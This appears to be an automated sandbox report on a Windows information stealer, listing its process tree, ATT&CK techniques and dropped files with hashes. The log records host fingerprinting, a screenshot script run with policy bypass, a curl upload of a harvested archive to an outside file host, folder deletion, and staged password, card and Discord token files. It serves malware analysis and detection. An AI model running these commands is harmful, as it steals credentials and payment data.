    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
  2⤵
  PID:3620
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic memorychip get serialnumber
    3⤵
    PID:624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:4476
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:1456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
  2⤵
  PID:2144
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic csproduct get uuid
    3⤵
    PID:5048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
  2⤵
  PID:4404
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get processorid
    3⤵
    PID:1212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:2016
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
  2⤵
  PID:1780
- - C:\Windows\system32\getmac.exe
    getmac /NH
    3⤵
    PID:4388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:2872
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:2660
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:2236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:864
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:4216
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:628
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:4940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:3192
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:1408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:2004
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:1956
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:4672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:3720
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:3840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:3620
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:1848
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:1180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:2144
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:3516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:4524
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:4716
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""
  2⤵
  PID:1136
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Bvrkipts.zip";"
  2⤵
  PID:388
- - C:\Windows\system32\curl.exe
    curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Bvrkipts.zip";
    3⤵
    PID:4392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:2816
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:4644
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:4032
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:1584
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:3028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:3104
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:2452
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:3292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:4672
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:2436
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:4488
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:3856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:452
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:4796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:2724
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:5048
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:5004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""
  2⤵
  PID:2752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:1268
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:2468
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:5116
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:4524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:2656
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:3444
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:2852
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:1728
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:3920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:1920
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:864
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:5092
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:2180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:4996
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:4004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:3764
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:2960
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:1564
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:3292
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:1264
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:4992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:2120
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:3488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:3840
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:3620
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:3556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:1044
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:3796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:4476
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3516

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Steam\Launcher\EN-BVR~1\debug.log

Filesize
2KB

MD5
4be9f4b64fb03bd6fc3da30a0b14927d

SHA1
f27de1574130bca43d5bfe75a73fe02413db6aad

SHA256
d8d2f1a384301e571d263570094078b0e274c60a4dc25fb1f833fffddfe54707

SHA512
3b92cca295b070f5fae107ef7aa048e212b033f2964080f5625a8f79b050a984019c820b98aa42c9b78d3ba0599dbc274ab46e8b483e9d80af569b858f578d93

Download Submit
C:\ProgramData\Steam\Launcher\EN-Bvrkipts.zip

Filesize
2KB

MD5
bbd96081a6c7d6ee23d76ab343c0482b

SHA1
20ed6c834f80637686eec73c21fdc683d2ff0ae5

SHA256
0b160117e2ee89f92a02f52666b1e889dfccbe36c0bef928f33dba888fc87191

SHA512
6ff8b12de68ed3cd908bd448a3bc9e3ab944e80507f31a1a9da904190844af94f636ed50b37e983c8d240684463e2d318f820e1d059afa8fa7259cffddbe6329

Download Submit
C:\ProgramData\Steam\Launcher\EN-Bvrkipts\Autofills\Autofills.txt

Filesize
94B

MD5
2f308e49fe62fbc51aa7a9b987a630fe

SHA1
1b9277da78babd9c5e248b66ba6ab16c77b97d0b

SHA256
d46a44dd86cea9187e6049fd56bb3b450c913756256b76b5253be9c3b043c521

SHA512
c3065baa302032012081480005f6871be27f26da758dc3b6e829ea8a3458e5c0a4740e408678f3ecf4600279d3fcad796f62f35b8591e46200ce896899573024

Download Submit
C:\ProgramData\Steam\Launcher\EN-Bvrkipts\Cards\Cards.txt

Filesize
70B

MD5
8a0ed121ee275936bf62b33f840db290

SHA1
898770c85b05670ab1450a96ea6fbd46e6310ef6

SHA256
983f823e85d9e4e6849a1ed58e5e3464f3a4adbe9d0daeeadd1416cf35178709

SHA512
7d429ce5c04a2e049cdf3f8d8165a989ab7e3e0ac25a7809c12c4168076492b797d2eebaf271ae02c51cb69786c2574ec3125166444e4fa6fc73430f75f8f154

Download Submit
C:\ProgramData\Steam\Launcher\EN-Bvrkipts\Discord\discord.txt

Filesize
15B

MD5
675951f6d9d75fd2c9c06b5ff547c6fd

SHA1
9b474ab39d1e2aad52ea5272dbac7d4f9fe44c09

SHA256
60fe7843b40ed5b7c68118bbba6bfe5f786a76397cdedb80612fd7cefce7f244

SHA512
44dfb6c937283870c6eedf724649004a82631cd8eeb3f9c83e5bca619d1c9ffb8aa5f51c91d57f76789e2747712ce9c6ad207773928e5e00e712f640f8c25aea

Download Submit
C:\ProgramData\Steam\Launcher\EN-Bvrkipts\Passwords\Passwords.txt

Filesize
78B

MD5
c5e74f3120dbbd446a527e785dfe6d66

SHA1
11997c2a53d19fd20916e49411c7a61bfb590e9c

SHA256
e0fd13d912d320faaa64e177b4e75f54ec140692ebc5904d10e1cbe3e811ee05

SHA512
a2bab776d22abf857c7df84b3c90851829eda615fbd450c9c72ab89f97591224380990a86c8e7e40ac811aa1225592743eebed63125d519d138fa28b859f2a3f

Download Submit
C:\ProgramData\Steam\Launcher\EN-Bvrkipts\Screenshots\Screenshot.png

Filesize
438KB

MD5
47b15804cc0e799df83875999e98d0af

SHA1
17ce0154aa04403becbdbb333789abb8c003ac4b

SHA256
c341fc0892ff608bb175d54c5d4b64319df80ff08f91bdff542524d17d46878b

SHA512
77bd864abad8f33a18d85f0b2ad9dca28f8007632cca020546da50d94bf2a15f830a247d6e5ca3e691fc456231416f74396b56e27869f7f419111dd0fdddc54c

Download Submit
C:\ProgramData\Steam\Launcher\EN-Bvrkipts\Serial-Check.txt

Filesize
506B

MD5
26654a9e695889e4eaf05e01a1e4ae39

SHA1
7b4b92522a624a26c12b4ba97788c4ccc16872de

SHA256
b623def79c65549ae7fab1c6ca5db27a6f1714bdaaf15a3ed8247776ecf19b5d

SHA512
970a4a2d174b8f77990134a3160c387521c6d049bec315c2678e13b6f954fd8f146b2d03f0d02d19490d9deb922f8022fa1ca78b4a74b4dbc40958c166aa76c1

Download Submit
C:\ProgramData\Steam\Launcher\EN-Bvrkipts\debug.log

Filesize
1KB

MD5
0a1c8dc342493c21efce5b8fb143dab4

SHA1
2ce37062762d70a619a290e1424d74e5c178f7c5

SHA256
729a30b0fb247da1e2b759e5d913d712a0576f4c57ed65d13bd1c3e36cf54465

SHA512
a45dc517be9545ecec7827a9e62b52b5da6ebac7f0f8a6c5ebbd05f7f4ebaa740706bdd5780a4b4267bd6d69cc3a894e3723e722a1d0d8d20c70d550d976a9e6

Download Submit
C:\ProgramData\Steam\Launcher\EN-Bvrkipts\stolen_files.zip

Filesize
22B

MD5
76cdb2bad9582d23c1f6f4d868218d6c

SHA1
b04f3ee8f5e43fa3b162981b50bb72fe1acabb33

SHA256
8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85

SHA512
5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

Download Submit
C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat

Filesize
1KB

MD5
93f90bda499e44e7497ed86627232b18

SHA1
711d3ed2e1d427dd6633ac3f1f258382694ac050

SHA256
e396e532af9adbdce7bf1f018313422779f32e750bc8193131525922334821c2

SHA512
edc2522ce9afef5bbaf9b89990ecb0913fe5d033979c1015682aa2fecde84bf4d757a484d744cf1bad78904e512b9b9632f3beedba1a743a13719216b0adfb4f

Download Submit
C:\ProgramData\edge\Updater\Get-Clipboard.ps1

Filesize
3KB

MD5
a8834c224450d76421d8e4a34b08691f

SHA1
73ed4011bc60ba616b7b81ff9c9cad82fb517c68

SHA256
817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5

SHA512
672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596

Download Submit
C:\ProgramData\edge\Updater\RunBatHidden.vbs

Filesize
146B

MD5
14a9867ec0265ebf974e440fcd67d837

SHA1
ae0e43c2daf4c913f5db17f4d9197f34ab52e254

SHA256
cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1

SHA512
36c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3f01549ee3e4c18244797530b588dad9

SHA1
3e87863fc06995fe4b741357c68931221d6cc0b9

SHA256
36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a

SHA512
73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
68d80cc2ac40ea9e5c7297fba6623c45

SHA1
05908daef7414f753fa6006082c42485002a7da8

SHA256
3b059d656dae93233a96c9079352c1d77c6abfec689cc6236b93b427c9918e96

SHA512
2c51e963eba030ee4f2ef5df1577a8ce38cacd6ffc3d0c56258db173352b46cd6048505061c65bd5757d14e2e27d9d396cbce95d58406660af62365bd4e7afb6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4929391ac0711915eefbfe6c22169ebc

SHA1
f924d20912200885bc87efa4cf9cab6183ae9468

SHA256
116c12404aadd9579315921314bbb0fc44eb9b76839722720fea84843161b922

SHA512
a3947dc6f5667e75851e8b68b74e9ef390050a4233a2952cafd20d1ee1488a8b464cd0a1b0e5e884e982111d236cfbe4f552a03b5ed70c606c4251006f5eda1d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
7f5040b7d0495ad05b6c255020a43af3

SHA1
a48b8e3867370762af1da836a6ac61f6199601de

SHA256
45ea002d0fb07a41b200a7c5df2b35b0b57beedadbcedfd372112d99f0a04c0d

SHA512
1168867cfb7ba4287707ebb9087cebc83871934bc852556e83223b67d19d896239e4a2d8ee7016ed597c28cd9bd68f01cbfec183cfc5ed4873583c8354fc97c5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
31a287524525945b2b7252bd7d4b9fbe

SHA1
3064cff52c91b160cca9c704e64e815535c8d765

SHA256
51503d597e05ef2e1f0d5d7d55a53716c16efdd399e5912dfbe97e2be68f92b2

SHA512
5b7b13fa99a0fdac9ea736618e9ae783db9f4c0194047f3025bb8392f349bda9421af345392ef6daaa5b9851d7e770d085762e1afb6336269ce48cd10af27357

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
052b68d98977d4f52cc6afabfa743b06

SHA1
63b671a71cc5ec6b76218b0094784a5e21e08e7f

SHA256
199ac916bb90b9b2107eb749d5c65411c387c7d59f0a2d19d17674983287116a

SHA512
e20517e1d3b755c17c617f9cbab3de19a4b29fc16a3422bbde30530130c2865173b85ee24e336b20c4706740250bc062f789d0c6989d4ed15c6f8527033693af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1

Filesize
2KB

MD5
9161beb967c9aa0acb2e15b0e8a229fa

SHA1
3380743736ad0f9acb57f32f0c28c415a2e09a9c

SHA256
4adf851c1a3a8d5c55f904819f9a4d86f1d67c869a01cca6faa731d4889204ba

SHA512
d99999a1ec7d28916dac5679a47f23c61d3520683aa97910c95fce6a924558fc076f38b6b74646b08737aa7d8c7fb5ed1a5dad058c00ace38f5005896463427a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES519A.tmp

Filesize
1KB

MD5
f5d2f0f6185b849a5fc31389546dae10

SHA1
436394a0d1c57ef0198a3ffa2ff548ae74064275

SHA256
9a0452ee310ea066b804f4d4188c7725a833853060e199e0bcf0cd528f9e6c89

SHA512
7500692bc05d49c49c789bdb8159bee54982d8be108d0685f2a053487cad2e655f108cbf8abd01131f7427980d3b144049f5e1cb2a4d5c6e983f8ad4444df2bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES5B10.tmp

Filesize
1KB

MD5
25c6f0f23ee9ab674507af77f8def0dc

SHA1
1224b17534adeb6a8ae7b6205fdb62ceb79470e6

SHA256
c5feb9a63adcaca83a3191b1328b955cc20521bea8460809664287795df6d1a5

SHA512
f586aca01c33b3de9d4c389d3258af947a43e32078358ce906a643ad46ef7aef4497c4529a44e943b6866a218f42f5f9e26f8acb23060399684d10c386687b86

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zfm53g5l.bjp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\guyctqcu\guyctqcu.dll

Filesize
3KB

MD5
8c5e26c0625112737c0c52d4d7df10cd

SHA1
a5af1f4166d6b779da1de85e64f625d9aabcf4e7

SHA256
ec527dd7ba24f640e663b2ab856ed84905ec3918693f13e4399cdf0669ac378d

SHA512
20e097af536a082a030c513d4e501f237bb87120bed6af7bd88e78931dfe7fc96ec98be6e52330532820814a50944b02ca51ee643814a0131143ebfaaea1d562

Download Submit
C:\Users\Admin\AppData\Local\Temp\ofqx0hsz\ofqx0hsz.dll

Filesize
3KB

MD5
266681ac4ef5c9435d27351b03a15496

SHA1
1895c406b16eaf22f5df0a7807a954d7f39ec34f

SHA256
f8d8654d523dd429652abef506d3089c8038aafab64c5022d28443455ed117a6

SHA512
569e758435aa6bff568ca893178d6df200e42dd3b281347735c8b96f13f4a9c87da26ebe57a753d0ea97146433397d9e52880e5116b9b3f1d7cbbc42a8a15e01

Download Submit
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

Filesize
1.8MB

MD5
66a65322c9d362a23cf3d3f7735d5430

SHA1
ed59f3e4b0b16b759b866ef7293d26a1512b952e

SHA256
f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c

SHA512
0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

Download Submit
C:\Users\Admin\AppData\Local\Temp\temp.ps1

Filesize
379B

MD5
18047e197c6820559730d01035b2955a

SHA1
277179be54bba04c0863aebd496f53b129d47464

SHA256
348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3

SHA512
1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877

Download Submit
